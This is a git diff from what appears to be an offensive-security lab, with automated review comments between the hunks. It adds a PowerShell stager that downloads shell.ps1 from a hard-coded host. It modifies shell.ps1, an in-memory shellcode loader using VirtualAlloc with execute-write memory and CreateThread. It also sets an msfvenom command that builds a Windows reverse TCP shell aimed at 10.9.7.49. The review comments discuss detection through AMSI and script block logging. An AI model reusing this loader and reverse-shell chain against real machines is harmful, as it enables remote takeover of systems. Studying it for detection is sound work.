diff --git a/8/download.ps1 b/8/download.ps1
new file mode 100644
index 0000000..0d820bb
--- /dev/null
+++ b/8/download.ps1
@@ -0,0 +1 @@
+(New-Object System.Net.WebClient).DownloadData('http://10.9.7.49:8000/shell.ps1')
diff --git a/8/shell.ps1 b/8/shell.ps1
index ce83413..ae2ea65 100644
--- a/8/shell.ps1
+++ b/8/shell.ps1
@@ -1,40 +1,31 @@
-$Buf =
+[Byte[]] $buf =
 $VrtAlloc = @"
 using System;
 using System.Runtime.InteropServices;
-
 public class VrtAlloc{
 [DllImport("kernel32")]
- public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+ public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 }
 "@
-
 Add-Type $VrtAlloc
-
 $WaitFor= @"
 using System;
 using System.Runtime.InteropServices;
-
 public class WaitFor{
 [DllImport("kernel32.dll", SetLastError=true)]
- public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
+ public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
 }
 "@
-
 Add-Type $WaitFor
-
 $CrtThread= @"
 using System;
 using System.Runtime.InteropServices;
-
 public class CrtThread{
- [DllImport("kernel32", CharSet=CharSet.Ansi)]
- public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-
+[DllImport("kernel32", CharSet=CharSet.Ansi)]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
 }
 "@
-Add-Type $CrtThread
-
+Add-Type $CrtThread
 [IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
 [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
 $thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
diff --git a/8/venom.sh b/8/venom.sh
index 655354e..1cfc910 100755
--- a/8/venom.sh
+++ b/8/venom.sh
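Review bot: The new one-line 8/download.ps1 has no comment saying what it is for or where it may be run; a header such as `# Lab exercise (authorized range only): fetches 8/shell.ps1 from the operator host` would make the scope explicit. The fetch goes over cleartext `http://` to a hard-coded private address, so both the request and the script body are visible to any proxy or network sensor on the path. Use of `System.Net.WebClient` from PowerShell is also recorded by script block logging (event ID 4104) where that is enabled, which is worth noting for anyone using the file as a detection exercise. The same address is repeated in 8/venom.sh, so the two files have to be kept in step by hand.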
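Review bot: The constants passed to `VirtualAlloc` on the context line after `Add-Type $CrtThread` are undocumented; a comment such as `# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE` would tell a reader that the region is writable and executable at the same time. A writable-and-executable allocation followed by `Marshal.Copy` and `CreateThread` from a PowerShell host is a sequence that AMSI, script block logging and endpoint tooling are designed to flag, and a file header saying so would help readers who study this as a detection case. The `[DllImport]` and `extern` lines added in `CrtThread` appear to have lost the indentation the other two classes keep, though leading whitespace is not reliable in this view. The old side is 40 lines, so the script presumably continues past the end of the hunk.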
@@ -1 +1 @@
-msfvenom -p windows/x64/shell_reverse_tcp LHOST="$1" LPORT=1337 -f powershell
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.7.49 LPORT=4444 -f powershell
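Review bot: The new line no longer reads `"$1"`, so any argument passed to venom.sh is silently ignored, and an environment-specific address is now committed in two files (here and 8/download.ps1). A leading comment such as `# LHOST/LPORT are fixed to the lab listener; command-line arguments are ignored` would record the changed interface for the next reader.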